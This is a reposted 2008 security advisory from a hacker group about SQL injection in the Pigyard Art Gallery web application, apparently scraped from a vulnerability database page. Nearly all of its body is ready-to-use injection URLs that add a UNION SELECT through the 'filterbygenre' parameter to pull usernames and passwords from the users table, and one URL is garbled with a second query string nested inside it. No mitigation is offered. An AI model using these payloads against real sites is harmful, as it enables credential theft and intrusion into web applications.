Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19272
HistoryFeb 26, 2008 - 12:00 a.m.

Pigyard Art Gallery Multiple SQL Injection

2008-02-2600:00:00
vulners.com
17

Aria-Security Team,
http://Aria-Security.net

Shout Outs: AurA, imm02tal, iM4N, Kinglet,
Vendor: Pigyard Art Gallery Multiple SQL Injection
This is a completation of the original advisory reported by ZoRLu @ Milw0rm
(http://www.milw0rm.com/exploits/5181)

Original Link: http://forum.aria-security.net/showthread.php?p=1474

module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999//union//select//username,password,0,0,0,0,0//from//users/*
module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/
/union//select//username,password,0,0,0,0,0//from//users/*

Regards,
The-0utl4w
Credits Goes To Aria-Security.Net